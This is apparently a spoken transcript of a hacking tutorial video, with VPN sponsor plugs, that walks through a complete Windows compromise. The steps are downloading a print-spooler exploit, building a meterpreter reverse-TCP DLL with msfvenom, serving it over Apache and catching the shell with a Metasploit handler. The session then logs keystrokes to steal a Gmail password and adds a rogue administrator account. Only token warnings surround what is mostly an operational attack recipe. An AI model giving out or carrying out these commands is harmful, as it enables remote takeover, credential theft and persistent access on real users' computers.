And yes, today we'll be learning a hacking technique where you send a file to the user, and once they click onto the file, that's it. It's game over. And this is really scary stuff because the moment you open up the file, it's gone. And remember, hacking is illegal. And of course, if you would send this file over to Hacker Loy, then I promise you that I will find you. I will find your IP address. I'll find all the devices you have, all of the accounts that you own. So here's what we'll be going through today. The first part is that we'll learn about how we can get the file that we can then send over into the user account. So once the user gets the file, that's it. It's game over. We'll be able to take complete control of it. The second part of all is about how can we get a reverse shell into the account. So meaning that once the user clicks onto the file, we'll be able to get a communication to the hacker's machine. So of course, in this case, it's going to be Mr. Hacker Loy. And of course, before we get started, remember to smash the like button and turn on notification for a subscription to the channel so that you don't get hacked. Oh, and by the way, check out Alan's VPN on the description and the link below. So what exactly is a VPN? As you can see right here, we have the following. So we have the computer on the left side, and the computer would then access over onto the internet. If there is a hacker right in the middle, it means that the hacker can pick it up. So in this case, say for example, you're connected over to a free Wi-Fi, all right? So you think for sure that this is a free Wi-Fi, but behind the scene, what's going on is that Mr. Hacker Loy actually set up this fake free Wi-Fi access, and once you join through it, it will be able to see everything you're doing right here. So your internet connection and your accesses is going to be hijacked by Mr. Hacker Loy. And the best part of all is that we have secured a really good discount together with Alice VPN. So go ahead, click on the link in the description and get your access right now. So right in front of us, I'm on Kali Linux. So this is going to be our ethical hacking and penetration testing tool. So right in front of us, I'm on the place called Spoolful. So this is a GitHub repository, and this is the place where we'll be downloading the executable. And then once we send it over to the user, it's game over. So all you got to do, all right, is head over to a couple of the files over here. All right, so these are the key files that we'll be taking a look at. And you can do that just by clicking onto the file over here, say spoolful.exe, click under download, and this will give you the opportunity to save it. So in this case, you can save the file, or you can save it to wherever you want. So in this case, we can save it over into, say, desktop. Right? So all you gotta do is just click save, and that's it, you're done. All right, I can replace it, whichever the case is. What we want to do is ultimately to be able to furnish this file over to the target user. And all we got to do now is go ahead and open up terminal. And once you're on terminal, all you got to do right now is just go ahead and enter sudo systemctl start apache2.service. All right, so go ahead and take a look at that and see whether you're able to start up the service. Okay, so let's go ahead and enter our password, and that's it. All right, so we're able to start up the service so that we can serve the file over to the target user, and you can enter status. And from status, you can see that we have the web server running over there for us so that we can serve those files to the target user. Next thing you want to do is to cd over to where you have saved the file. So in this case, you can cd this desktop. And what you can do here is you can enter ls, and of course you can look up for anything that's related to spool. All right, so let's go ahead and enter that. And we got a following spoolful.exe. So what you want to do here is to go ahead and copy this file. All right, so copy spoolful and then over to var www.html, hit enter on that. All right, so of course we can enter sudo again because there's a permission deny. And that's it, done. We've copied it over and we're serving it over onto the network. The next thing you want to do is to be able to create a malicious dynamic link library DLL file so that once the user clicks onto the file, it opens up the bad payload, and then with that, we'll get a reverse shell over into the machine. So we'll be using MSF Venom to create this malicious DLL file. So all you got to do is enter the following, all right? So you enter MSF Venom-P, which is for the platform. So in this case, you have Windows x64 interpreter, all right, followed by /reverse_TCP. And of course, in this case, -AX64, and then followed by -FDLL for the DLL file, lhost equal 192.168.0.192, followed by the L port, in this case, 4444. And of course, we can point this out over to hackerloy.dll. Hit enter on that, and that's it, done. We're creating this malicious DLL file, and we'll be able to send it over to the user. Okay, it's really fast, and all we gotta do now is do copy hackerloy.dll over to var www.html, hit enter on that. So once we hit over to cd var www.html, we can do ls to see whether we have all these files over here. So I can do ls grab hackerloy.dll. That's it, we have it. And at the same time, of course, we also want to take a look at whether we have spoolful inside over here. Okay, so I enter grab spool. All right, so we got both the critical files right here. And now we're jumping over into our Windows computer, and this is the computer that we're going to hack into. This is crazy. So all I gotta do is open up, say, any of the browser, and I target over into the IP address of Kali Linux. So if I jump over into Kali Linux, in order to get the IP address, all you gotta simply do is enter IP-addr. So in this case, we have the following IP address right here, right? So 192.168.0.192. And then we jump back over into the Windows computer or the target machine that we're going to hack into, okay? So all you're going to do now is enter 192.168, all right, followed by .0.192/ spool_full.exe, hit enter on that, and we can save the file. So let's save it over into desktop. So I saved the file, and we can see the file right here. The next thing we can do is, of course, to download the hackerloy.dll. So let's go ahead and enter hackerloy.dll, hit enter again, and then we can save the file, click OK, and now we have saved both of these files onto the download page. Now, wait a second. We're missing something. We got to start up our listener so that we are able to connect over into the hacked machine. Now, jumping back over to Kali Linux, all you got to do is enter sudo msfconsole. So this will start up our Metasploit framework. And from here, all we got to do is use the same exact payload. And then after which, this gives us the power to be able to remotely control the computer. So all you got to do now is enter use exploit multi-handler. And then after which, we want to specify the payload that we created earlier. Remember what was the payload? All you got to do is enter set payload windows/x64 followed by /meterpreter followed by /reverse_tcp, and they show options over here. And what we can see over here now is to set the L host. So remember the IP address of 192.168.0.192. So this is the Kali Linux hacking IP address. And once you're done with that, go ahead and enter run. And now we're waiting. So you can see the following: started reverse TCP handler on 192.168.0.192 4444. Now jumping back over into the Windows computer, all you gotta do is go into, say, command prompt, and for command prompt you can do the following. Okay, so here I can cd into downloads, and from downloads I can see dir, and this will show us the following. All right, so in this case we have the following of the hackerloy.dll over here, and of course also spoolfull.exe. So all we gotta do now is execute it, and we'll have complete control of the entire computer. So all I gotta do now is enter the following: spool_full.exe followed by -dll, and then target, in this case, hackerloy.dll. So we want to execute hackerloy.dll. So in 3, 2, 1, hit enter, and you can see the following: we are hacking over and we're restarting the spooler, and this gives us complete control of the entire computer. And you can see a really important piece of information right here, which states DLL should be loaded. And when I jump back over into Kali Linux, look at that. We're in. It's literally game over. And all I got to do is enter sysinfo, and I'll be able to see all this information about the computer system. And I can even take this to the next level by doing the following: by enter ps to list down all the processes within the computer, and I can migrate to over one of them and start a key logging service. So in this case, say for example, I enter migrate over into 4548. So I enter migrate 4548. I hit enter on that. You can see the migration starting right now. And all I got to do is enter keyscan_start. So we're starting up a keystroke sniffer that we can see everything that the user is typing. Wait, what? You don't believe that we can do that? Well, let me show you what's going to happen right now. Now I jump back into the hacked computer. I go into, say, gmail.com. I hit enter on that, and say I go over into sign in. And if I see the following, I enter loy.liangyang@gmail.com. I click next, and I enter the following password. So you have no idea what is hackerloy's password. I entered it over here. I click next, whatever the case is. All we got to do now is jump back over into Kali Linux, and all I got to do is enter keyscan_dumb. I hit enter on that. We can see right here, this is the place where we're able to see what is hackerloy's password of 123456778. And yes, go ahead and enter a password on the comment section so that I can help you review your password. So to take it to the next level, you can see right here, I'm logged into the following account. All right, so in this case, I can go over into command prompt, and of course, I can see that I'm using script kitty loy. All right, so this is another account that I have, and I can enter net user script kitty loy. All right, so I hit enter on that, and you see the following: I am not part of any administrative accesses whatsoever, so I have no ability to run a lot of instructions directly within the computer. So what I can do now is I can cd over into desktop, and right here I can enter dir, and we have several options available. So if you remember earlier with hackerloy.dll, which is just a reverse shell, and of course we have spoolfull, all right, .exe. This gives us the ability to run as system as administrator. So this is really powerful. And after which we can easily create another user within the computer to give us more and more control and access into the entire computer system. So what I can do now is to go back into Kali Linux. So once I'm back on Kali Linux, I can enter the following: show options, and we can see the following over here. So with exploit multi-handler, Windows x64 interpreter, reverse TCP, and of course I have the IP address set right here. So I can enter run. So we're now listening. And all I got to do is jump back over into target computer, and all I got to do now is go and enter spoolful.exe followed by -dll followed by hackeralloy.dll. I hit enter on this. It states the following: DLL should be loaded, and all I got to do now is jump back over to Kali Linux. We can see a interpreter session. So we are in. And what I can show you now is I can enter sysinfo, and I can enter shell, and I can enter who am I. So you can see right here, all right, we got the following: anti-authority system. And we can take this to the next level by creating, say, a completely new user who has administrative access. And this gives us complete control of the computer itself. So we can enter the following, okay? We can enter net user followed by a new username. So in this case, I can enter, say, for example, Mr. Hackerloy. And then I can enter the password of, say, 1234567 and I can enter the following of /@ hit enter on that. Net user Mr. Hackerloy has been added to command, completed successfully. And now what I can do is I can enter net local group, right, followed by administrators, okay, and then followed by Mr. Hackerloy. And of course over here, all I gotta do is enter /@ hit enter on that. Net local group administrators Mr. Hackerloy /@ the command completed successfully. Now if I jump back into the hacked computer, I see the bottom left side. I can see right here, okay, we have Mr. Hackerloy being added. This is amazing. Clicked on it. Now we're logging in over to Mr. Hackerloy, and what is the password? 1234567 hit enter on that. This gives us a completely new user experience, and we're completely taken over the entire computer. There you go. Within a few minutes, we gain complete control of a computer because of a mispatch, because of a vulnerability, because of a weakness that's been taken advantage of in the computer system. And what you want to do all the time is to always ensure that the computer is up to date so that it makes it significantly harder for hackers to break directly into your computers.